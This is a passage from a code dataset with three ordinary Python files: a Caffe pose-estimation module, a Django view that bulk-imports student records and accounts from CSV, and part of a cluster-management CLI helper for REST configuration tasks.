"usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 68, 
"usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 117, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 119, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 145, "usage_type": "call"}]}
+{"seq_id": "12224587916", "text": "#!/usr/bin/env python\n\n\"\"\"\npose_cpm.py: Convolutional Pose Machines.\nBased on @shihenw code:\nhttps://github.com/shihenw/convolutional-pose-machines-release/blob/master/testing/python/demo.ipynb\n\"\"\"\n__author__ = \"David Pascual Hernandez\"\n__date__ = \"2017/05/22\"\n\nimport math\nimport os\n\n# Avoids verbosity when loading Caffe model\nos.environ[\"GLOG_minloglevel\"] = \"2\"\n\nimport caffe\nimport cv2\nimport numpy as np\n\nfrom pose import PoseEstimator\n\nfrom matplotlib import pyplot as plt\n\n\ndef crop_human(sample, c, s, bsize):\n \"\"\"\n Crop human in the image depending on subject center and scale.\n @param sample: np.array - input image\n @param c: list - approx. human center\n @param s: float - approx. human scale wrt 200px\n @param bsize: int - boxsize\n @return: np.array - cropped human\n \"\"\"\n cx, cy = c\n\n # Resize image and center according to given scale\n im_resized = cv2.resize(sample, None, fx=s, fy=s)\n\n h, w, d = im_resized.shape\n\n pad_up = int(bsize / 2 - cy)\n pad_down = int(bsize / 2 - (h - cy))\n pad_left = int(bsize / 2 - cx)\n pad_right = int(bsize / 2 - (w - cx))\n\n # Apply padding or crop image as needed\n if pad_up > 0:\n pad = np.ones((pad_up, w, d), np.uint8) * 128\n im_resized = np.vstack((pad, im_resized))\n else:\n im_resized = im_resized[-pad_up:, :, :]\n h, w, d = im_resized.shape\n\n if pad_down > 0:\n pad = np.ones((pad_down, w, d), np.uint8) * 128\n im_resized = np.vstack((im_resized, pad))\n else:\n im_resized = im_resized[:h + pad_down, :, :]\n h, w, d = im_resized.shape\n\n if pad_left > 0:\n pad = np.ones((h, pad_left, d), np.uint8) * 128\n im_resized = np.hstack((pad, im_resized))\n else:\n im_resized = im_resized[:, -pad_left:, :]\n h, w, d = im_resized.shape\n\n if pad_right > 0:\n pad = np.ones((h, pad_right, d), np.uint8) * 128\n im_resized = np.hstack((im_resized, pad))\n else:\n im_resized = im_resized[:, :w + pad_right, :]\n\n return im_resized\n\n\ndef map_resize(new_shape, heatmap):\n # Resizes the output back to the size of the test image\n scale_y = new_shape[0] / float(heatmap.shape[0])\n scale_x = new_shape[1] / float(heatmap.shape[1])\n map_resized = cv2.resize(heatmap, None, fx=scale_x, fy=scale_y,\n interpolation=cv2.INTER_CUBIC)\n\n return map_resized\n\n\nclass PoseCPM(PoseEstimator):\n def __init__(self, model_fname, boxsize, sigma, confidence_th=0.3):\n \"\"\"\n Constructs Estimator class.\n @param model_fname: Caffe models\n @param weights: Caffe models weights\n \"\"\"\n PoseEstimator.__init__(self, model_fname, boxsize, confidence_th)\n self.model, self.weights = self.model_fname\n self.sigma = sigma\n self.gauss_map = self.gen_gaussmap()\n\n def init_net(self):\n caffe.set_mode_gpu()\n self.net = caffe.Net(self.model, self.weights, caffe.TEST)\n\n def estimate(self):\n \"\"\"\n Estimates human pose.\n @param im: np.array - input image\n @param gaussmap: np.array - Gaussian map\n @return: np.array: articulations coordinates\n \"\"\"\n if not self.net:\n self.init_net()\n\n # Adds gaussian map channel to the input\n input_4ch = np.ones((self.im.shape[0], self.im.shape[1], 4))\n input_4ch[:, :, 0:3] = self.im / 256.0 - 0.5 # normalize to [-0.5, 0.5]\n input_4ch[:, :, 3] = self.gauss_map\n\n # Adapts input to the net\n input_adapted = np.transpose(np.float32(input_4ch[:, :, :, np.newaxis]),\n (3, 2, 0, 1))\n self.net.blobs['data'].reshape(*input_adapted.shape)\n self.net.blobs['data'].data[...] 
= input_adapted\n\n # Estimates the pose\n output_blobs = self.net.forward()\n pose_map = np.squeeze(self.net.blobs[output_blobs.keys()[0]].data)\n\n return pose_map\n\n def gen_gaussmap(self):\n \"\"\"\n Generates a grayscale image with a centered Gaussian\n @param sigma: float - Gaussian sigma\n @return: np.array - Gaussian map\n \"\"\"\n gaussmap = np.zeros((self.boxsize, self.boxsize, 1))\n for x in range(self.boxsize):\n for y in range(self.boxsize):\n dist_sq = (x - self.boxsize / 2) * (x - self.boxsize / 2) \\\n + (y - self.boxsize / 2) * (y - self.boxsize / 2)\n exponent = dist_sq / 2.0 / self.sigma / self.sigma\n gaussmap[y, x, :] = math.exp(-exponent)\n\n return np.squeeze(gaussmap)\n\n def get_coords(self, sample, human_bbox, get_pose_maps=False):\n \"\"\"\n Estimate human pose given an input image.\n @param sample: np.array - original input image\n @param human: np.array - cropped human image\n @param config: dict - CPM settings\n @param model: pose estimator object\n @param c: np.array - human center\n @param s: int - human scale\n @param viz: bool - flag for joint visualization\n @return: np.array - joint coords\n \"\"\"\n caffe.set_mode_gpu()\n\n (ux, uy), (lx, ly) = human_bbox\n\n # # Get scale\n # scale = float(self.boxsize) / (np.max([np.abs(ux - lx), np.abs(uy - ly)]) + 50)\n #\n # # Get center\n # cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n #\n # im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # # plt.figure(), plt.imshow(im_human), plt.show()\n\n # Get scale\n scale = float(self.boxsize) / sample.shape[0]\n # Get center\n cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # plt.figure(), plt.imshow(im_human), plt.show()\n\n self.im = im_human.copy()\n\n pose_map = self.estimate()\n\n joint_coords = []\n for joint_map in pose_map:\n joint_map_resized = map_resize(self.im.shape, joint_map)\n\n # Find joint heatmap maxima\n joint = [-1, -1]\n if joint_map_resized.max() >= self.confidence_th:\n joint = list(np.unravel_index(joint_map_resized.argmax(),\n joint_map_resized.shape))\n\n # Back to full coordinates\n joint[0] = (joint[0] - (self.boxsize / 2) + cy) / scale\n joint[1] = (joint[1] - (self.boxsize / 2) + cx) / scale\n\n joint_coords.append(joint)\n\n joint_coords = np.array([[int(x), int(y)] for y, x in joint_coords])\n\n if get_pose_maps:\n return joint_coords, pose_map\n else:\n return joint_coords\n\n\nif __name__ == \"__main__\":\n model_fname = [\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_deploy_resize.prototxt\",\n \"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_iter_320000.caffemodel\"]\n sigma = 21\n\n boxsizes = [384, 192, 128, 92]\n\n from matplotlib import pyplot as plt\n plt.figure()\n\n for idx, boxsize in enumerate(boxsizes):\n pe = PoseCPM(model_fname, boxsize, sigma)\n\n im = cv2.imread(\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Samples/nadal.png\")\n bbox = np.array([[237, -21], [597, 338]])\n joints, pose_maps = pe.get_coords(im, bbox, get_pose_maps=True)\n print(pose_maps.shape)\n\n # plt.figure()\n # plt.subplot(441), plt.imshow(pe.im[:, :, ::-1])\n # for idx in range(pose_maps.shape[0]):\n # plt.subplot(4, 4, idx + 2), plt.imshow(pose_maps[idx])\n # plt.show()\n\n limbs = [1, 2, 3, 4, 4, 5, 6, 7, 7, 8, 9, 10, 10, 11, 12, 13, 13, 14]\n limbs = np.array(limbs).reshape((-1, 2)) - 1\n\n colors = [[0, 0, 255], [0, 170, 255], [0, 255, 
170], [0, 255, 0],\n [170, 255, 0], [255, 170, 0], [255, 0, 0], [255, 0, 170],\n [170, 0, 255]]\n\n\n def draw_estimation(im, bbox, joints, limbs, colors, stickwidth=6):\n upper, lower = bbox\n cv2.rectangle(im, tuple(upper), tuple(lower), (0, 255, 0), 3)\n\n for i, (p, q) in enumerate(limbs):\n px, py = joints[p]\n qx, qy = joints[q]\n\n if px >= 0 and py >= 0 and qx >= 0 and qy >= 0:\n m_x = int(np.mean(np.array([px, qx])))\n m_y = int(np.mean(np.array([py, qy])))\n\n length = ((px - qx) ** 2. + (py - qy) ** 2.) ** 0.5\n angle = math.degrees(math.atan2(py - qy, px - qx))\n polygon = cv2.ellipse2Poly((m_x, m_y),\n (int(length / 2), stickwidth),\n int(angle), 0, 360, 1)\n cv2.fillConvexPoly(im, polygon, colors[i])\n\n if px >= 0 and py >= 0:\n cv2.circle(im, (px, py), 3, (0, 0, 0), -1)\n if qx >= 0 and qy >= 0:\n cv2.circle(im, (qx, qy), 3, (0, 0, 0), -1)\n\n return im\n\n im_drawn = draw_estimation(im, bbox, joints, limbs, colors)\n plt.subplot(2, 2, idx + 1), plt.title(\"Boxsize = %dpx\" % boxsize), plt.imshow(im_drawn[:, :, ::-1])\n plt.show()\n\n", "repo_name": "RoboticsLabURJC/2017-tfm-david-pascual", "sub_path": "src/Estimator/Pose/pose_cpm.py", "file_name": "pose_cpm.py", "file_ext": "py", "file_size_in_byte": 9334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pose.PoseEstimator", "line_number": 88, "usage_type": "name"}, {"api_name": "pose.PoseEstimator.__init__", "line_number": 95, "usage_type": "call"}, {"api_name": "pose.PoseEstimator", "line_number": 95, "usage_type": "name"}, {"api_name": "caffe.set_mode_gpu", "line_number": 101, "usage_type": "call"}, {"api_name": "caffe.Net", "line_number": 102, "usage_type": "call"}, {"api_name": "caffe.TEST", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 137, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 145, "usage_type": "call"}, 
{"api_name": "caffe.set_mode_gpu", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 232, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 249, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 252, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.ellipse2Poly", "line_number": 253, "usage_type": "call"}, {"api_name": "cv2.fillConvexPoly", "line_number": 256, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 259, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}]}
+{"seq_id": "23137312673", "text": "import logging\nimport string\nfrom datetime import datetime\nimport random\n\nimport pandas as pd\nfrom django.contrib.auth import get_user_model\nfrom django.utils.text import slugify\n\nfrom rest_framework import permissions\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom members.models import PersonalProfile\nfrom students.models import Student\nfrom students.serializers import StudentSerializer\n\nUser = get_user_model()\n\n\ndef generate_random_password():\n chars = string.ascii_letters + string.digits + string.punctuation\n return ''.join((random.choice(chars)) for x in range(20))\n\n\ndef process_students_data_file(full_file_path):\n logging.info(msg='Reading inputs')\n student_data = pd.read_csv(full_file_path)\n for row_index in student_data.index:\n reg_no = student_data['reg_no'][row_index]\n birth_date = student_data['birth_date'][row_index]\n birth_date = datetime.strptime(birth_date, '%d/%m/%Y').date()\n first_name = student_data['first_name'][row_index]\n middle_name = student_data['middle_name'][row_index]\n last_name = student_data['last_name'][row_index]\n degree = student_data['degree'][row_index]\n department = student_data['department'][row_index]\n reg_year = int(student_data['reg_year'][row_index])\n pass_year = int(student_data['grad_year'][row_index])\n gender = student_data['gender'][row_index]\n email = student_data['email'][row_index]\n email = str(email).lower().replace(' ', '')\n contact = student_data['contact'][row_index]\n student_info = {\n 'reg_no': reg_no,\n 'birth_date': birth_date,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'degree': degree.lower().replace(' ', ''),\n 'department': department,\n 'reg_year': reg_year,\n 'pass_year': pass_year,\n 'gender': gender[0]\n }\n logging.info(msg=f'Processing {student_info} with {email} and {contact}')\n try:\n student = Student.objects.create(**student_info)\n if email:\n username = slugify(email)\n user_info = {\n 'username': username,\n 'email': email,\n 'name': f'{first_name} {last_name}',\n }\n user = User.objects.create_user(username=username,\n email=email,\n password=generate_random_password())\n user.name = f'{first_name} {last_name}'\n try:\n user.save()\n member_info = {\n 'user': user,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'gender': gender[0],\n 'student': student,\n 'birth_date': student.birth_date,\n 'phone': contact\n }\n try:\n member = PersonalProfile.objects.create(**member_info)\n except Exception as ex:\n logging.error(msg=f'{member_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{user_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{student_info}', extra=ex)\n\n\nclass StudentViewSet(ModelViewSet):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass BatchUploadStudentsView(GenericAPIView):\n permission_classes = (permissions.IsAuthenticated, permissions.IsAdminUser,)\n\n def put(self, request, *args, **kwargs):\n students_data_file = request.FILES.get('file')\n with students_data_file.file as csv_file:\n process_students_data_file(csv_file)\n return Response(status=204)\n", "repo_name": "harshalgalgale/alumni-api", "sub_path": "students/views.py", "file_name": "views.py", "file_ext": "py", 
"file_size_in_byte": 4222, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 20, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "students.models.Student.objects.create", "line_number": 60, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 60, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 62, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects.create", "line_number": 85, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "members.models.PersonalProfile", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 87, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 94, "usage_type": "name"}, {"api_name": "students.models.Student.objects.all", "line_number": 95, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 95, "usage_type": "name"}, {"api_name": "students.serializers.StudentSerializer", "line_number": 96, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 100, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 101, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}]}
+{"seq_id": "41493983062", "text": "__author__ = \"Sumit Sharma\"\n__copyright__ = \"Copyright 2022, Luna2 Project [CLI]\"\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = \"Sumit Sharma\"\n__email__ = \"sumit.sharma@clustervision.com\"\n__status__ = \"Development\"\n\nimport os\nfrom time import time, sleep\nimport base64\nimport binascii\nimport subprocess\nfrom random import randint\nfrom os import getpid\nfrom multiprocessing import Process\nfrom copy import deepcopy\nimport hostlist\nfrom termcolor import colored\nfrom nested_lookup import nested_lookup, nested_update, nested_delete, nested_alter\nfrom luna.utils.rest import Rest\nfrom luna.utils.log import Log\nfrom luna.utils.presenter import Presenter\nfrom luna.utils.constant import EDITOR_KEYS, BOOL_KEYS, filter_columns, sortby\nfrom luna.utils.message import Message\n\n\nclass Helper():\n \"\"\"\n All kind of helper methods.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor - As of now, nothing have to initialize.\n \"\"\"\n self.logger = Log.get_logger()\n\n\n def choice_to_bool(self, raw_data=None):\n \"\"\"\n This method will convert string choices to\n boolean\n \"\"\"\n for key in BOOL_KEYS:\n content = nested_lookup(key, raw_data)\n if content:\n if content[0] is not None:\n if content[0] == '':\n raw_data = nested_update(raw_data, key=key, value='')\n elif content[0].lower() in ['y', 'yes', 'true']:\n raw_data = nested_update(raw_data, key=key, value=True)\n else:\n raw_data = nested_update(raw_data, key=key, value=False)\n return raw_data\n\n\n def prepare_payload(self, table=None, raw_data=None):\n \"\"\"\n This method will prepare the payload.\n \"\"\"\n raw_data = self.choice_to_bool(raw_data)\n payload = {k: v for k, v in raw_data.items() if v is not None}\n for key in EDITOR_KEYS:\n content = nested_lookup(key, payload)\n if content:\n if content[0] is True:\n if table:\n get_list = Rest().get_data(table, payload['name'])\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n if get_list:\n value = nested_lookup(key, get_list)\n if value:\n content = self.open_editor(key, value[0], payload)\n payload = nested_update(payload, key=key, value=content)\n else:\n content = self.open_editor(key, None, payload)\n payload = nested_update(payload, key=key, value=content)\n elif content[0] is False:\n payload = nested_delete(payload, key)\n elif content[0]:\n if os.path.exists(content[0]):\n if os.path.isfile(content[0]):\n with open(content[0], 'rb') as file_data:\n content = self.base64_encode(file_data.read())\n payload = nested_update(payload, key=key, value=content)\n else:\n Message().error_exit(f'ERROR :: {content[0]} is a Invalid filepath.')\n else:\n content = self.base64_encode(bytes(content[0], 'utf-8'))\n payload = nested_update(payload, key=key, value=content)\n return payload\n\n\n def open_editor(self, key=None, value=None, payload=None):\n \"\"\"\n This Method will open a default text editor to\n write the multiline text for keys such as comment,\n prescript, postscript, partscript, content etc. 
but\n not limited to them only.\n \"\"\"\n response = ''\n editor = str(os.path.abspath(__file__)).replace('helper.py', 'editor.sh')\n os.chmod(editor, 0o0755)\n random_path = str(time())+str(randint(1001,9999))+str(getpid())\n tmp_folder = f'/tmp/lunatmp-{random_path}'\n os.mkdir(tmp_folder)\n if key == 'content':\n filename = f'/tmp/lunatmp-{random_path}/{payload[\"name\"]}{key}'\n else:\n filename = f'/tmp/lunatmp-{random_path}/{key}'\n temp_file = open(filename, \"x\", encoding='utf-8')\n if value:\n value = self.base64_decode(value)\n temp_file.write(value)\n temp_file.close()\n subprocess.check_output(f\"sed -i 's/\\r$//' {editor}\", shell=True)\n subprocess.call([editor, filename])\n with open(filename, 'rb') as file_data:\n response = self.base64_encode(file_data.read())\n os.remove(filename)\n os.rmdir(tmp_folder)\n return response\n\n\n def get_list(self, table=None, args=None):\n \"\"\"\n Method to list all switches from Luna Configuration.\n \"\"\"\n response = False\n fields, rows = [], []\n get_list = Rest().get_data(table)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table]\n if args['raw']:\n json_data = Helper().prepare_json(data)\n # print(json_data)\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data(table, data)\n # fields = list(map(lambda x: x.replace('tpm_uuid', 'tpm_present'), fields))\n # fields = list(map(lambda x: x.replace('ns_ip', 'nameserver'), fields))\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f' << {table.capitalize()} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} is not found.')\n return response\n\n\n def show_data(self, table=None, args=None):\n \"\"\"\n Method to show a switch in Luna Configuration.\n \"\"\"\n row_name = None\n if 'name' in args:\n row_name = args['name']\n get_list = Rest().get_data(table, row_name)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n if row_name:\n data = get_list['config'][table][row_name]\n else:\n data = get_list['config'][table]\n json_data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data_col(table, data)\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f'{table.capitalize()} => {data[\"name\"]}'\n response = Presenter().show_table_col(title, fields, rows)\n else:\n response = Message().show_error(f'{args[\"name\"]} is not found in {table}.')\n return response\n\n\n def member_record(self, table=None, args=None):\n \"\"\"\n This method fetch the nodes to the provided entity.\n \"\"\"\n response = False\n get_list = Rest().get_data(table, args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table][args[\"name\"]]['members']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = 
Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'Nodes']\n rows = []\n for member in data:\n new_row = [num, member]\n rows.append(new_row)\n num = num + 1\n title = f'<< {table.capitalize()} {args[\"name\"]} Member Nodes >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} {args[\"name\"]} does not have any node.')\n return response\n\n\n def reserved_ip(self, args=None):\n \"\"\"\n This method will fetch all the reserved IP Address for a network.\n \"\"\"\n response = False\n get_list = Rest().get_data('network', args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config']['network'][args[\"name\"]]['taken']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'IP Address', 'Device Name']\n rows = []\n for each in data:\n new_row = [num, each['ipaddress'], each['device']]\n rows.append(new_row)\n num = num + 1\n title = f'<< Reserved IP Addresses for Network {args[\"name\"]} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'Network {args[\"name\"]} does not have any IP reserved.')\n return response\n\n\n def add_record(self, table=None, data=None):\n \"\"\"\n This method will add a new record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(None, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n message = f'{payload[\"name\"]} already present in {table.capitalize()}'\n Message().error_exit(message, record.status_code)\n else:\n response = Rest().post_data(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def update_record(self, table=None, data=None):\n \"\"\"\n This method will update a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n if 'raw' in data:\n data.pop('raw', None)\n payload = self.prepare_payload(table, data)\n name = None\n if 'name' in payload:\n name = payload['name']\n request_data = {'config':{table:{name: payload}}}\n else:\n request_data = {'config':{table: payload}}\n if 'cluster' in table:\n request_data = {'config':{table: payload}}\n self.logger.debug(f'Payload => {request_data}')\n if 'cluster' in table:\n response = Rest().post_data(table, None, request_data)\n else:\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n if len(payload) == 1:\n Message().error_exit('Kindly choose something to update.')\n else:\n response = Rest().post_data(table, name, request_data)\n else:\n Message().error_exit(f'Kindly add the {payload[\"name\"]} first', record.status_code)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n if name:\n Message().show_success(f'{table.capitalize()} {name} is updated.')\n else:\n Message().show_success(f'{table.capitalize()} is updated.')\n else:\n Message().error_exit(response.content, response.status_code)\n return 
True\n\n\n def delete_record(self, table=None, data=None):\n \"\"\"\n This method will delete a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n self.logger.debug(f'Payload => {data}')\n response = Rest().get_delete(table, data['name'])\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is removed.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def rename_record(self, table=None, data=None, newname=None):\n \"\"\"\n This method will rename a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_data(table, data['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is renamed to {newname}.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def clone_record(self, table=None, data=None):\n \"\"\"\n This method will clone a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(table, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_clone(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def grab_osimage(self, table=None, data=None):\n \"\"\"\n Method to grab an osimage for a node.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Grabbing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_osgrab'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_grabbing_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_grabbing_status(uri)\n else:\n return False\n 